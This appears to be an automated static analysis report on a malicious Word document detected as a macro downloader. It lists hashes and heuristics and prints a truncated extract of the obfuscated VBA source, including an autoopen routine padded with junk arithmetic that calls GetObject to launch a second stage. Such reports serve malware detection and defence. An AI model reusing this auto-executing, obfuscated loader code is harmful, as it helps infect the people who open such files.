Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f5ca2bb01cd70b29…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 185.0 KB
Created: 2019-03-27 14:41:00
Authoring application: Microsoft Office Word
First seen: 2019-04-21
MD5: 03e07a0532dc7e1bcdcf0243b9350f15
SHA-1: 145645e929a3c44fe440235bd3741e91c26eead7
SHA-256: f5ca2bb01cd70b2905fb37bbc02fed796fe635f7278822387fa99c36157c0096
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Sagent-6914418-0. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that utilizes GetObject for execution. The VBA script itself is heavily obfuscated, but the presence of auto-execution markers and the GetObject call strongly suggest it is designed to download and execute a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Sagent-6914418-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-6914418-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28651 bytes
SHA-256: eec7727c7b5c5f81caf3535dbb49a9febbf927432fc2e4921f5a1906318ef7ad
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "CkAQcA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HAoXA1_X"
Attribute VB_Base = "0{EBE6F477-B303-4598-9375-60BE047813DD}{2702FB28-6846-4E2C-92ED-056B286F11D6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z4BU4D4"
Attribute VB_Base = "0{AAA210F5-9882-4399-AC87-F6B0CAE0DB89}{CBE1C865-EB3C-4969-A478-D476EEAB7DAA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "hDBZAB"
Function qQUUAGQ()
   If NACACUZ = A4AA_AA Then
Q1A1AD = qBA4QA - Oct(331278819) / ZQD4wwZA - Sin(WQDCAxZ + _
Atn(977241109) - jooCGCwX * Log(305751311)) + (458786967 + _
CByte(264703690 / 465185178 + 203655251 * Cos(82432276))) + PX_4UQAG / Hex(ixG4oX + Cos(260009438) / EUxXcUD * 468433249)
End If
   If Q1AQDA = HcDAQoA Then
OUw_kG = BUxowBkA - Hex(528101112) / YA4AAZ - Hex(PXAAAoD + _
CByte(733832635) - EADBGQC * CDbl(233980342)) + (540149645 + _
CSng(355787251 / 710851249 + 465977666 * Cos(373301416))) + QAwcAAXk / Rnd(mwUADAAA + Cos(676312983) / PACCBXB * 598145508)
End If
   If EwXQQADA = AAUAAA Then
OUwAwA = F_wxAAC - Round(262308508) / jxA1X4GA - Oct(IQGQQD + _
Cos(170141531) - KxQAGAAA * Log(803271456)) + (493680211 + _
CDate(968561302 / 763747578 + 234455008 * Sqr(87881898))) + b4AUx1 / Atn(mBADUc_ + CBool(790424781) / jAAAABA * 553005649)
End If
   If ZAABDkoD = Ic4AUCDQ Then
zABwoBAA = pcoB_Q - Sqr(68331188) / VXBwDBAo - Cos(aBCx4B + _
Oct(966672806) - wAwoXDQ * Tan(957579480)) + (27188270 + _
CBool(671478167 / 802174613 + 453520323 * Cos(59099996))) + QABXUA / CSng(roXDDoQA + Hex(608953740) / YAAAAxBA * 494950968)
End If
   If W1XAc4 = CUBXooD Then
IACZoA = XQQ41QB - Log(782459971) / ucwwZDw - Fix(IAUAcZAG + _
Rnd(561936418) - mQD1xQ * Rnd(262199896)) + (392050985 + _
CDate(164135849 / 537032470 + 111801 * CInt(936863797))) + WAZ141U / Rnd(CAkcAA + Atn(225550600) / JD_BAQ * 66021371)
End If
   If QACAAAxD = qACA_U Then
GQAA1BAX = p1AoAUA - Sqr(954194030) / SQcDXAA - CByte(sUXGAoZA + _
CStr(211459845) - X1QBAAwA * Oct(441593240)) + (983030768 + _
CLng(770701634 / 744691332 + 947405755 * Hex(111814102))) + FAUCoww / CDate(ZBAC4AG + Round(327815156) / r11UAAo * 583811202)
End If
   If iwQAZX = pAADX_A Then
zAQBCk = VAUAxGU - Round(361382906) / jQXAkAQ - CLng(bcoDQBAw + _
CSng(709683583) - kDDAXQQ * Round(769418414)) + (829545629 + _
CInt(504451760 / 279386443 + 245274628 * Cos(472490872))) + VBG_AAA / Rnd(vUxQ1ADD + Tan(296566604) / aQAUADAA * 78051327)
End If
End Function
Sub autoopen()
On Error Resume Next
   If EA1UQCD = NCZU1AD Then
hUZQAA = VwXAAUU - CBool(258779783) / bxBAxU - Sin(q1xkk1 + _
Sin(926433455) - fQB1Qox * Oct(199197996)) + (255086066 + _
CByte(376121828 / 20767113 + 976098434 * CInt(413870544))) + i_AAAZ / Atn(DCQAZA + Cos(866305272) / lAXcBUGc * 441909576)
End If
   If L1_wAA = IxAGwcGQ Then
tcAGZAAo = zAoUA4o - CSng(476945432) / zAoAwZ - Rnd(RB1AAxA + _
Oct(793087819) - NBBAxk * Hex(636202113)) + (616396799 + _
CDate(390529827 / 301493655 + 613691278 * Log(882553177))) + hAAw_CDk / Sin(A1AZA_A + CDbl(785860271) / FAwAAC * 544462726)
End If
   If qUw4ooC = d4DAkAQ Then
lAAAAA = qQAAAADD - Log(851254025) / JQAAcAD - CSng(wDBAwAGA + _
Sin(434504076) - CUGU1A * CBool(803862929)) + (341250382 + _
Tan(481099805 / 842291079 + 936115240 * CInt(419182756))) + EUA1B4 / Sqr(i1GxC4 + CLng(43871790) / MBAAAAA * 961154307)
End If
Set YoCoQ1C = GetObject(HAoXA1_X.IZBAAA4.Text + Z4BU4D4.i4ACXB + HAoXA1_X.IZBAAA4.Text)
   If BwXAA44o = NBA4kB Then
QAA1D_ = sAQQACQD - Cos(27541042
... (truncated)